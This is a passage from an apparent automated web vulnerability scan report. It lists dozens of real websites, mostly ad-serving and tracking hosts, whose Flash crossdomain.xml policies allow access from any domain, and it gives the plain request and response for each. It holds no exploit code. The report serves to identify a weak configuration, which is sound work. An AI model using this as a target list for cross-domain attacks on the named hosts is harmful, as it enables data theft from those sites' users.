Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

8.9. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205350000"
Last-Modified: Thu, 15 Jul 2010 14:49:10 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 02 May 2011 02:01:52 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.10. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


8.11. http://c.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 107
Content-Type: text/xml
Last-Modified: Tue, 24 Feb 2009 17:22:30 GMT
Accept-Ranges: bytes
ETag: "ca58579a496c91:c8a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: keep-alive

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.12. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 02 May 2011 02:10:39 GMT
Date: Mon, 02 May 2011 02:10:39 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.13. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "80468-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

8.14. http://dg.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 02 May 2011 02:04:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

8.15. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 02:09:18 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a52"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 02 May 2011 02:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 02:25:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

8.17. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:07:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

8.18. http://l.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 06:42:04 GMT
Cache-Control: max-age=315360000
Expires: Wed, 28 Apr 2021 06:42:04 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 60671
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

8.19. http://loadm.exelator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1405316268"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:58:27 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.20. http://loadus.exelator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2127011854"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.21. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:28:33 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.22. http://map.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 02 May 2011 02:35:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.23. http://metrics.washingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
xserver: www65
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

8.24. http://n4403ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.25. http://pix01.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix01.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.26. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.27. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 03 May 2011 01:57:46 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 02 May 2011 01:57:46 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

8.28. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:10:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:10:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.29. http://resources.infolinks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.infolinks.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=14400
Content-Type: text/xml
Date: Mon, 02 May 2011 02:27:36 GMT
ETag: "8c8ace-52-493eb73b9d9c0"
Expires: Mon, 02 May 2011 06:27:36 GMT
Last-Modified: Sun, 31 Oct 2010 15:36:15 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 82
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

8.30. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 03:34:26 GMT
Expires: Sun, 01 May 2011 03:34:10 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 72005
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.32. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:10 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "184c003-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=300, max=11
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

8.33. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "2320194-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

8.34. http://usjobsresource.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usjobsresource.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Jan 2011 18:41:04 GMT
ETag: "fccc26-c6-49a0f204dd000"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.35. http://va.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.36. http://view.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Mon, 02 May 2011 02:20:11 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

8.37. http://www.4tubehd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4tubehd.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:40 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Fri, 19 Sep 2008 14:11:03 GMT
ETag: "31198a6-64-4574045896bc0"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.38. http://www.aces.edu/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aces.edu

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 01 Apr 2007 15:41:00 GMT
ETag: "1438701-ca-ee70bb00"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.39. http://www.architecturaldigest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturaldigest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.architecturaldigest.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Mon, 02 May 2011 00:29:00 GMT
Date: Mon, 02 May 2011 00:19:00 GMT
Content-Length: 131
Connection: close
X-N: S


<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.40. http://www.babesandstars.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babesandstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babesandstars.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:02 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 20:49:49 GMT
ETag: "5e403c1-8d-4a0fb2ec8f540"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

8.41. http://www.bakugandimensions.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bakugandimensions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bakugandimensions.com

Response

HTTP/1.1 200 OK
